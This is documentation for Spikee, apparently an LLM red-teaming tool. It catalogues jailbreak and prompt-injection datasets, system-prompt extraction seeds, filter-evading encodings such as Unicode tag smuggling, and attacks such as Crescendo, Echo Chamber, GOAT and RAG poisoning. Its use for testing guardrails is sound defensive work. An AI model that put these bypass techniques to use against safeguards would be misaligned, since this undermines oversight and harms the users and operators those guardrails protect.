Built-In Seeds and Modules

Spikee comes with a variety of built-in seeds and modules (e.g., targets, judges, plugins, attacks).

Built-in Seeds

Spikee comes with a variety of built-in seeds, each designed for a specific testing purpose. These seeds are located in the datasets/ directory after you run spikee init. You can list them at any time with spikee list seeds.

| Seed | Source | Type | Description |
| --- | --- | --- | --- |
| seeds-cybersec-2026-01 | Reversec | Cybersecurity | A general-purpose dataset for testing prompt injection and cybersecurity harms. It focuses on common attack goals seen in web application security, such as data exfiltration, cross-site scripting (XSS), and resource exhaustion. |
| seeds-harmful-instructions-only | Reversec | Objectives | Specifically designed for attacks using LLM Agents, such as Crescendo and LLM-Jailbreaker. These attacks require an instruction (objective) to generate their own attack vectors dynamically. Contains harmful instructions in instructions.jsonl, while leaving jailbreaks and user inputs as empty placeholders. |
| seeds-simsonsun-high-quality-jailbreaks | External | Jailbreaks | A high-quality set of contamination-free jailbreak prompts, specifically curated to avoid overlap with the training data of many common safety classifiers. |
| seeds-in-the-wild-jailbreak-prompts | External | Jailbreaks | Contains approximately 1,400 real-world jailbreak prompts collected from public sources like Discord and Reddit (filtered from the TrustAIRLab dataset). Ideal for testing a target's resilience against known, publicly available jailbreaks. |
| seeds-wildguardmix-harmful | External | Harmful | A dataset for testing harmful content generation. The prompts are sourced from the WildGuard-Mix dataset. |
| seeds-wildguardmix-harmful-fp | External | Harmful (FP) | A companion dataset to seeds-wildguardmix-harmful, containing benign (harmless) prompts. |
| seeds-toxic-chat | External | Harmful | A dataset for testing toxic prompts, filtered from 10K user prompts collected from the Vicuna online demo. |
| seeds-investment-advice | Reversec | Topical Guardrails | Designed to test topical guardrails that are supposed to block personal financial or investment advice. It includes both malicious instructions and standalone attack prompts. |
| seeds-investment-advice-fp | Reversec | Topical Guardrails (FP) | A companion dataset to seeds-investment-advice, containing benign (harmless) queries about financial topics. |
| seeds-sysmsg-extraction-2025-04 | Reversec | System Prompt Extraction | Specifically designed to test for system prompt extraction. The instructions and judges are tailored to detect if the target model leaks its own system prompt or initial instructions. |
| seeds-llm-mailbox | Reversec | Tutorial | An example seed tailored for testing an email summarization feature. The documents are sample emails, and the instructions are designed to test for vulnerabilities in that specific context. See the associated blog post for a detailed walkthrough. |
| seeds-empty | Reversec | Utility | An empty template folder. It contains empty documents.jsonl, jailbreaks.jsonl, and instructions.jsonl files. This is the recommended starting point when creating a new dataset from scratch, especially for standalone attacks. |
| seeds-mini-test | Reversec | Utility | A very small set of examples for quick, functional testing of Spikee itself. Use this to verify your setup or to test a new custom target or plugin without running a large number of tests. |

FP datasets are intended for use with the --false-positive-checks flag to measure how often a guardrail incorrectly blocks legitimate prompts when evaluating harmful content filters.
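As a rough illustration of what a false-positive check measures, the sketch below computes the share of benign prompts that a guardrail blocked. The function name and the sample results are hypothetical and are not taken from Spikee's own reporting code.

```python
def false_positive_rate(blocked_flags):
    """Fraction of benign prompts that the guardrail blocked.

    blocked_flags: iterable of booleans, one per benign prompt,
    True when the guardrail (incorrectly) blocked that prompt.
    """
    flags = list(blocked_flags)
    if not flags:
        raise ValueError("need at least one benign prompt")
    return sum(flags) / len(flags)


# Hypothetical outcome: 2 of 8 benign prompts were blocked.
benign_results = [False, True, False, False, True, False, False, False]
print(f"False positive rate: {false_positive_rate(benign_results):.1%}")
```

A lower value means the guardrail interferes less with legitimate use; it is best read alongside the attack success rate from the matching harmful dataset.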

External datasets require you to run a fetch script to download the prompts. See the README.md inside each seed folder for instructions. Some of these use an LLM judge by default, which will be specified in the seed's README.

Usage Example

spikee generate --seed ./seeds-cybersec-2026-01

Built-in Targets

Spikee includes a variety of built-in and sample targets, which can be listed at any time with spikee list targets.

Built-in targets are located within the spikee/targets/ folder and cover several common LLM providers. To use them, rename .env-example to .env and add any necessary API keys.

| Target | Type | Description |
| --- | --- | --- |
| llm_provider | Provider | Generic LLM target for supported LLM providers (e.g., openai, bedrock, google, ollama, etc.) (See Docs) |
| aws_bedrock_guardrail | Guardrails | Assess AWS Bedrock Guardrails |
| az_ai_content_safety_harmful | Guardrails | Assess Azure AI Content Safety Harm Categories |
| az_prompt_shields_document_analysis | Guardrails | Assess Azure Prompt Shields Document Analysis |
| az_prompt_shields_prompt_analysis | Guardrails | Assess Azure Prompt Shields Prompt Analysis |

Sample targets are provided within the workspace/targets/ folder - created by running spikee init. These demonstrate how to write custom targets and can be easily modified to assess an LLM application of your choice.

| Target | Type | Description |
| --- | --- | --- |
| sample_target | Single-Turn | Sends a GET request to a fictional application, demonstrating options and advanced guardrail and error handling. |
| sample_target_legacy | Single-Turn (Legacy) | Returns a mock message. This is a legacy target, demonstrating the older target format. |
| sample_pdf_request_target | Single-Turn | Sends a POST request containing a PDF to a fictional application. |
| test_chatbot | Multi-Turn | Sends requests to Spikee Test Chatbot |
| simple_test_chatbot | Multi-Turn | Implements the simple multi-turn target, and sends requests to Spikee Test Chatbot |
| llm_mailbox | Single-Turn | Sample target for email summarisation application tutorial |

Usage Example

spikee test --dataset datasets/cybersec-2026-01.jsonl \
            --target llm_provider \
            --target-options "bedrock/claude45-haiku"

Built-in Judges

Spikee includes several built-in judges to evaluate LLM responses, located within the spikee/judges/ and workspace/judges/ folders. These can be listed at any time with spikee list judges.

Basic Judges: These evaluate responses based on simple criteria.

  • canary: Checks if a predefined canary string is present in the response.
  • regex: Uses regular expressions to identify specific patterns in the response.
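The two basic checks can be sketched in a few lines of Python. This is a minimal illustration of the idea only: the function names, signatures, and sample response are hypothetical and do not reflect Spikee's actual judge interface.

```python
import re


def canary_judge(response: str, canary: str) -> bool:
    """Attack counts as successful when the canary string appears verbatim."""
    return canary in response


def regex_judge(response: str, pattern: str) -> bool:
    """Attack counts as successful when the pattern matches anywhere in the response."""
    return re.search(pattern, response) is not None


# Hypothetical response containing a Markdown image used for data exfiltration.
response = "Sure! ![img](https://attacker.example/?q=secret-token)"

print(canary_judge(response, "attacker.example"))
print(regex_judge(response, r"!\[[^\]]*\]\(https?://[^)]+\)"))
```

A canary check is the cheaper option when the payload asks for a fixed string; a regular expression helps when the expected output varies in a predictable shape, such as a URL with changing parameters.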

LLM Judges: For some test cases, success cannot be determined by a simple keyword or pattern. For instance, did the model's response contain harmful advice, or did it refuse to answer a question on a restricted topic?

LLM-based judges address this by using a separate LLM to evaluate the target's response against a natural language criterion.

  • llm_judge_harmful: LLM judge to evaluate whether the target LLM's response complied with a potentially harmful user prompt.
  • llm_judge_objective: LLM judge to evaluate whether the target LLM's response meets a specific input objective.
  • llm_judge_output_criteria: LLM judge to evaluate whether the target LLM's response meets specific success criteria defined in judge_args.

The LLM Agent model used by these judges can be specified using the --judge-options flag. See LLM Providers for a complete list of supported models, prefixes, and examples. Some common examples include:

  • offline: Mock judge, for restrictive environments. See re-judging and isolated environments documentation for more information.
  • bedrock/<model_name>: AWS Bedrock API (e.g., bedrock/claude45-haiku)
  • openai/<model_name>: OpenAI API (e.g., openai/gpt-4o-mini)
  • google/<model_name>: Google Gen AI API (e.g., google/gemini-2.5-flash)
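The values listed above follow a provider-prefix convention, with offline as a bare keyword. A minimal sketch of splitting such a value is shown below; split_model_option is a hypothetical helper for illustration, not a function from Spikee.

```python
def split_model_option(option: str):
    """Split 'provider/model' into its two parts.

    A value without a slash (such as 'offline') is returned with
    None in place of the model name.
    """
    provider, sep, model = option.partition("/")
    if not sep:
        return provider, None
    return provider, model


for value in ("offline", "bedrock/claude45-haiku", "openai/gpt-4o-mini"):
    print(value, "->", split_model_option(value))
```

Splitting on the first slash only keeps any later slashes inside the model name intact.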

Usage Example

# Use an offline judge, allowing for later re-judging
spikee test --dataset datasets/cybersec-2026-01.jsonl \
            --target llm_provider \
            --target-options "bedrock/claude45-haiku" \
            --judge-options offline

Built-in Plugins

Spikee includes several built-in plugins that can be used to enhance dataset generation. These are scripts that apply static transformations to payloads during dataset generation, and can create multiple iterations of each entry. Built-in plugins are located in the spikee/plugins/ directory; local plugins are located in the plugins/ directory within your workspace. You can list them at any time with spikee list plugins.

The following list provides an overview of each built-in plugin. Further information on each plugin can be found within the plugin file.

Key:

  • Basic: Simple text transformations.
  • Attack-Based: Plugins based on dynamic attack techniques that have been adapted to work as static transformations during dataset generation.
  • LLM: Plugins that leverage an LLM agent to generate variations of the input based on a specific attack strategy or objective.

| Plugin | Type | Description | Options |
| --- | --- | --- | --- |
| 1337 | Basic | Transforms text into "leet speak" by replacing certain letters with numbers or symbols. | N/A |
| ascii_smuggler | Basic | Transforms ASCII text into a series of Unicode tags that are generally invisible in most UI elements (bypassing content filters). | N/A |
| base64 | Basic | Encodes text using Base64 encoding. | N/A |
| ceasar | Basic | Applies a Caesar cipher to the text, shifting letters by a specified number of positions. | shift (number of positions to shift, default: 3) |
| flip | Basic | Applies a flip attack to obfuscate text. FWO: Flip Word Order; FCW: Flip Chars in Word; FCS: Flip Chars in Sentence. | mode (the flip mode to apply, default: FWO) |
| google_translate | Basic | Translates text to another language using Google Translate. | source-lang (language code for source language, default: en); target-lang (language code for target language, default: zh-cn) |
| opus_translator | Basic | Translates text to another language using local OPUS-MT models. | source (source language code, default: en); targets (target language(s), default: zh); quality (translation quality, default: 1); device (cpu or gpu, default: auto-detect); cache_dir (directory to cache ML models, optional) |
| hex | Basic | Encodes text into its hexadecimal representation. | N/A |
| mask | Basic | Masks high-risk words in the text with random character sequences, while providing a suffix that maps the masks back to the original words. | advanced (if true, creates multiple masks for longer words); advanced-split (the number of characters per mask chunk for the advanced option, default: 6) |
| morse | Basic | Encodes text into Morse code. | N/A |
| splat | Basic | Obfuscates the text using splat-based techniques (e.g., asterisks '*', special characters, and spacing tricks) to bypass basic filters. | character (the character to use for splatting, default: *); insert_rand (probability of inserting a splat within words, default: 0.6); pad_rand (probability of padding words with splats, default: 0.4) |
| anti_spotlighting | Attack-Based | Generates variations of delimiter-based attacks to test LLM applications against spotlighting vulnerabilities. | variants (number of variations to generate, default: 50) |
| best_of_n | Attack-Based | Implements "Best-of-N Jailbreaking" (John Hughes et al., 2024), applying character scrambling, random capitalization, and character noising. | variants (number of variations to generate, default: 50) |
| prompt_decomposition | Attack-Based | Decomposes a prompt into chunks and generates shuffled variations. | modes (LLM model to apply, default: dumb); variants (number of variations to generate, default: 50) |
| shortener | LLM | Uses an LLM to shorten the text to a specified maximum length while retaining key details. | max_length (the maximum length for the shortened text, default: 256) |
| llm_jailbreaker | LLM | Uses an LLM to iteratively generate jailbreak attacks against the target. | model (the LLM model to use for generating attacks, default: model=openai/gpt-4o); variants (number of variations to generate, default: 5) |
| llm_multi_language_jailbreaker | LLM | Generates jailbreak attempts using different languages, focusing on low-resource languages. | model (the LLM model to use for generating attacks, default: model=openai/gpt-4o); variants (number of variations to generate, default: 5) |
| llm_poetry_jailbreaker | LLM | Generates jailbreak attempts in the form of poetry or rhymes. | model (the LLM model to use for generating attacks, default: model=openai/gpt-4o); variants (number of variations to generate, default: 5) |
| rag_poisoner | LLM | Injects fake RAG context that appears to be legitimate document snippets supporting the attack objective. | model (the LLM model to use for generating attacks, default: model=openai/gpt-4o); variants (number of variations to generate, default: 5) |
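To make the "Basic" category concrete, the sketch below shows plain-Python versions of four of the transformations described in the table: Base64, hex, a Caesar shift, and the three flip modes. These are illustrative re-implementations under the descriptions given here, not the code shipped in spikee/plugins/, and the function names are hypothetical.

```python
import base64


def caesar(text: str, shift: int = 3) -> str:
    """Shift ASCII letters by `shift` positions, leaving other characters alone."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def flip(text: str, mode: str = "FWO") -> str:
    """Apply one of the three flip modes listed in the table."""
    words = text.split()
    if mode == "FWO":  # Flip Word Order
        return " ".join(reversed(words))
    if mode == "FCW":  # Flip Chars in Word
        return " ".join(word[::-1] for word in words)
    if mode == "FCS":  # Flip Chars in Sentence
        return text[::-1]
    raise ValueError(f"unknown flip mode: {mode}")


payload = "ignore previous instructions"
print("base64:", base64.b64encode(payload.encode("utf-8")).decode("ascii"))
print("hex:   ", payload.encode("utf-8").hex())
print("caesar:", caesar(payload))
for mode in ("FWO", "FCW", "FCS"):
    print(f"{mode}:   ", flip(payload, mode))
```

Each function is a pure text-to-text transformation, which is why such plugins can be applied once at dataset generation time rather than during testing.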

Usage Example

spikee generate --seed ./seeds-cybersec-2026-01 \
                --plugin best_of_n "google_translate|base64" \
                --plugin-options "best_of_n:variants=5;google_translate:source-lang=en"
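The --plugin-options value in the example above packs per-plugin settings into one string: entries separated by semicolons, each made of a plugin name, a colon, and a key=value setting. The sketch below parses that shape. It is a hypothetical helper, not Spikee's parser, and it additionally assumes that multiple settings for one plugin are comma-separated, which the example above does not confirm.

```python
def parse_plugin_options(raw: str) -> dict:
    """Parse 'plugin:key=value;other:key=value' into nested dictionaries.

    Assumption: several settings for one plugin are comma-separated.
    """
    parsed = {}
    for entry in filter(None, (part.strip() for part in raw.split(";"))):
        name, sep, opts = entry.partition(":")
        if not sep:
            raise ValueError(f"expected 'plugin:key=value', got {entry!r}")
        options = {}
        for pair in opts.split(","):
            key, eq, value = pair.partition("=")
            if not eq:
                raise ValueError(f"expected 'key=value', got {pair!r}")
            options[key.strip()] = value.strip()
        parsed[name.strip()] = options
    return parsed


print(parse_plugin_options("best_of_n:variants=5;google_translate:source-lang=en"))
```

Values are kept as strings; converting them (for example variants to an integer) is left to whichever plugin consumes them.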

Built-in Attacks

Spikee includes several built-in dynamic attacks that iteratively modify prompts/documents until they succeed (or run out of iterations). These are located within the spikee/attacks/ folder, and can be listed at any time with spikee list attacks.

You can customize the behavior of attacks using the following command-line options:

  • --attack-iterations: Specifies the maximum number of iterations for each attack (default: 1000).
  • --attack-options: Passes a single string option to the attack script for custom behavior (e.g., "mode=aggressive").

| Attack | Type | Description | Additional Options |
| --- | --- | --- | --- |
| anti_spotlighting | Standard | Assesses spotlighting vulnerabilities by sequentially trying variations of delimiter-based attacks. | N/A |
| best_of_n | Standard | Implements "Best-of-N Jailbreaking" (John Hughes et al., 2024), applying character scrambling, random capitalization, and character noising. | N/A |
| prompt_decomposition | Standard | Decomposes a prompt into chunks and generates shuffled variations. | modes (LLM model to apply, default: dumb); variants (number of variations to generate, default: 50) |
| random_suffix_attack | Standard | Implements Random Suffix Search techniques, which append random suffixes to the prompt to bypass filters. | N/A |
| llm_jailbreaker | LLM-Driven | Uses an LLM to iteratively generate jailbreak attacks against the target. | model (the LLM model to use for generating attacks, e.g., model=openai/gpt-4o) |
| llm_multi_language_jailbreaker | LLM-Driven | Generates jailbreak attempts using different languages, focusing on low-resource languages. | model (the LLM model to use for generating attacks) |
| llm_poetry_jailbreaker | LLM-Driven | Generates jailbreak attempts in the form of poetry or rhymes. | model (the LLM model to use for generating attacks) |
| rag_poisoner | LLM-Driven | Injects fake RAG context that appears to be legitimate document snippets supporting the attack objective. | model (the LLM model to use for generating attacks) |
| multi_turn | Simple Multi-Turn | Sequentially sends a predefined list of user prompts to the target LLM, from a simplistic multi-turn dataset. | N/A |
| crescendo | Instructional Multi-Turn | Implements the Crescendo Attack. This is a simple multi-turn jailbreak that uses an LLM Agent to send the target application seemingly benign prompts, then gradually escalates the conversation by referencing the model's replies, progressively leading to a successful jailbreak. | N/A |
| echo_chamber | Instructional Multi-Turn | Implements the Echo Chamber Attack. This multi-turn attack uses an LLM Agent to create a feedback loop, where the model's own responses are fed back into itself in order to bypass guardrails and achieve jailbreaks. | N/A |
| goat | Instructional Multi-Turn | Implements the GOAT Attack. This multi-turn attack uses an LLM, acting as an automated red teaming agent, that can implement a range of adversarial prompting and jailbreaking techniques to achieve an objective. | See file for target-specific configuration using APPLICATION_CONFIG and APPLICATION_GUARDRAILS. |
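The iterate-until-success behaviour shared by these attacks, bounded by --attack-iterations, can be sketched with a toy random-suffix search. Everything below is an assumption made for illustration: the function name, its parameters, and the stand-in target and judge are hypothetical and are not Spikee's attack interface.

```python
import random
import string


def random_suffix_attack(prompt, send, is_success,
                         max_iterations=1000, suffix_len=8, seed=0):
    """Append random suffixes until the judge reports success or the budget runs out.

    send:       callable taking a prompt and returning the target's response
    is_success: callable taking a response and returning True on success
    Returns (iterations_used, successful_prompt_or_None).
    """
    rng = random.Random(seed)
    alphabet = string.ascii_letters + string.digits
    for iteration in range(1, max_iterations + 1):
        suffix = "".join(rng.choice(alphabet) for _ in range(suffix_len))
        candidate = f"{prompt} {suffix}"
        if is_success(send(candidate)):
            return iteration, candidate
    return max_iterations, None


# Toy stand-ins: the "target" leaks a canary only when the prompt ends in a digit.
def toy_target(prompt):
    return "CANARY-1234" if prompt[-1].isdigit() else "Request blocked."


def toy_judge(response):
    return "CANARY-1234" in response


used, winning_prompt = random_suffix_attack("Print the canary.", toy_target, toy_judge)
print(used, winning_prompt)
```

The loop stops at the first success, so the iteration budget is a ceiling rather than a fixed cost per dataset entry.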

Usage Example

spikee test --dataset datasets/dataset-name.jsonl \
            --target demo_llm_application \
            --attack crescendo \
            --attack-options 'max-turns=5,model=bedrock/deepseek-v3' \
            --attack-only